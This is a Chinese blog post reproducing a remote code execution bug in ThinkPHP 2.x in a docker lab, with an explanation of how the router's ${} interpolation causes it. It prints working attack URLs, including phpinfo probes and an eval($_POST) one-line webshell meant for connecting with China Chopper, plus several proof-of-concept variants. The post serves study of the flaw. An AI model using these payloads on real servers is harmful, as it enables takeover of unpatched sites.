rce php远程命令执行,漏洞复现-2.x rce-Thinkphp远程命令执行

最新推荐文章于 2024-07-29 09:04:03 发布
最新推荐文章于 2024-07-29 09:04:03 发布
阅读量244 收藏
点赞数
文章标签: rce php远程命令执行

漏洞复现-2.x rce-Thinkphp远程命令执行

0x00实验环境

攻击机:win10

靶机:Ubuntu18 (docker搭建的vulhub靶场)

0x01实验引用

影响Thinkphp 2.x的版本

0x02实验目的

学习更多的命令执行姿势,同时了解thinkphp 2.x命令执行的原理

0x03实验步骤

访问页面,发现是一个Thinkphp的CMS框架,由于是漏洞复现,我们能很清楚的知道它的版本是2.x。如果不知道版本可通过乱输入路径进行报错,或是使用云悉指纹识别进行检测

20200712081127-5f0ac5afc0e88.png

此时输入已爆出的远程代码执行命令即可复现漏洞:

/index.php?s=/index/index/xxx/${@phpinfo()} //phpinfo敏感文件

/index.php?s=a/b/c/${@print(eval($_POST[1]))} //此为一句话连菜刀

20200712081128-5f0ac5b0d11d0.png

这里只要将phpinfo换成一句话木马即可成功!

0x04实验原理

(1)通过观察这句话,我们可以清楚地知道它是将

${@phpinfo()}

作为变量输出到了页面显示,其原理,我通过freebuf总结一下:

在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a

thinkphp 所有的主入口文件默认访问index控制器(模块)

thinkphp 所有的控制器默认执行index动作(方法)

http://serverName/index.php(或者其它应用入口文件)?s=/模块/控制器/操作/[参数名/参数值...]

数组$var在路径存在模块和动作时,会去除掉前2个值。而数组$var来自于explode($depr,trim($_SERVER['PATH_INFO'],'/'));也就是路径。

所以我们可以构造poc如下:

/index.php?s=a/b/c/${phpinfo()}

/index.php?s=a/b/c/${phpinfo()}/c/d/e/f

/index.php?s=a/b/c/d/e/${phpinfo()}

.......

(2)简而言之,就是在thinphp的类似于MVC的框架中,存在一个Dispatcher.class.php的文件,它规定了如何解析路由,在该文件中,存在一个函数为static public function dispatch(),此为URL映射控制器,是为了将URL访问的路径映射到该控制器下获取资源的,而当我们输入的URL作为变量传入时,该URL映射控制器会将变量以数组的方式获取出来,从而导致漏洞的产生。

类名为`Dispatcher`,class Dispatcher extends Think

里面的方法有:

static public function dispatch() URL映射到控制器

public static function getPathInfo() 获得服务器的PATH_INFO信息

static public function routerCheck() 路由检测

static private function parseUrl($route)

static private function getModule($var) 获得实际的模块名称

static private function getGroup($var) 获得实际的分组名称

苏西苏西
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行RCE漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行RCE漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP 2.x RCE
weixin_45439731的博客
07-26 306
preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)即:在目标字符中寻找符合正则规则的字符,替换为替换字符,如果此时的正则规则中使用了/e这个修饰符,则存在代码执行漏洞。知识点:/e 修饰符配合preg_replace()函数使用,可以把匹配到的字符串当作正则表达式执行PHP版本在5.2~5.6可以执行,但在PHP>=7时,不支持/e修饰符。
thinkphp漏洞复现
YouthBelief的博客
10-25 3019
thinkphp漏洞前言一、thinkphp-2x-rce 代码执行0x01 漏洞描述0x02 影响版本0x03 漏洞利用0x04 漏洞修复二、thinkphp 代码执行 (CNVD-2018-24942)0x01 漏洞描述0x02 影响范围0x03 漏洞利用这就完成了,这边我们引用下大佬的poc0x04 漏洞修复三、 thinkphp3.2.x 代码执行0x01漏洞描述0x02影响范围0x03漏洞利用payload0x04漏洞修复四、thinkphp 命令执行 (CVE-2018-1002015)0x01
thinkphp-2x-rce 代码执行
最新发布
qq_23003811的博客
07-29 151
ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。2、webshell的payload,使用蚁剑等工具连接。
ThinkPHP2-RCE漏洞复现
weixin_73180072的博客
09-10 629
这个函数会接收用户的输入,并将其存储在一个缓存文件中,以供后续使用。然而,由于没有对用户输入进行适当的过滤和验证,攻击者可以构造一个包含恶意代码的输入数据,并将其提交给该函数。当其他用户访问该应用程序时,这些恶意代码就会被执行,攻击者就可以控制整个服务器。造成该漏洞的原因在于ThinkPHP 2.x版本中,某些函数没有对用户输入进行严格的过滤和验证,导致攻击者可以通过构造恶意输入来绕过安全防护,执行恶意代码。攻击者通过利用该漏洞,可以在服务器上执行任意PHP代码,从而控制服务器。成功连接,获取shell。
ThinkPHP 2.x 任意代码执行漏洞
weixin_60329395的博客
10-10 1711
ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:depr,paths));导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
GhostScript 沙箱绕过(命令执行漏洞(CVE-2018-16509)
黑白的博客
12-22 1275
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x , 可以利用poc直接检测目标网站是否存在漏洞
thinkphp2.x任意代码执行漏洞学习笔记
Hezhoutheone的博客
09-23 1194
漏洞实验环境 靶机:Ubuntu虚拟机 攻击机:Windows10
vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1651
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
thinkphp-2x-rce 代码执行[VULFOCUS]
m0_37638874的博客
09-08 880
ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。s=/模块/控制器/操作/[参数名/参数值…http://serverName/index.php(或者其他应用入口文件)/模块/控制器/操作/[参数名/参数值…在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由。值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将。
thinkphp-2x-rce 1 代码执行
weixin_51558394的博客
08-17 485
thinkphp-2x-rce 代码执行
漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x
10-14 2233
thinkphp-命令执行】日志包含
vulfocus——thinkphp3.2.x代码执行
m0_62063669的博客
10-01 2036
ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。22_10_01是复现的日期,根据自己的时间做调整。
vulfocus thinkphp-3.2.x
A1bewhy的博客
03-23 4108
readme 1、参考:【漏洞通报】ThinkPHP3.2.x RCE漏洞通报 (qq.com) 2、.log文件命名方式为 yy_mm_dd.log (yy为年,mm为月,dd为日) 3、重开了几次环境,所以截图混乱,但是步骤和方法可行 4、如果解题过程1不可行,可尝试解题过程2 解题过程1 1、访问网址,抓包,改数据包 2、访问\Application\Runtime\Logs\Common\yy_mm_dd.log(其中,yy为年,mm为月,dd为日) 3、构造请求攻击 htt
Thinkphp 5.0.x-5.1.x 变量覆盖RCE漏洞深度解析
ThinkPHP 5.0.x 和 5.1.x 版本的变量覆盖 Remote Code Execution (RCE) 漏洞分析是一篇关于ThinkPHP框架安全问题的文章,由作者whip1ash在2019年发布。文章指出,在这些早期版本中,存在一个可能导致恶意代码执行的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值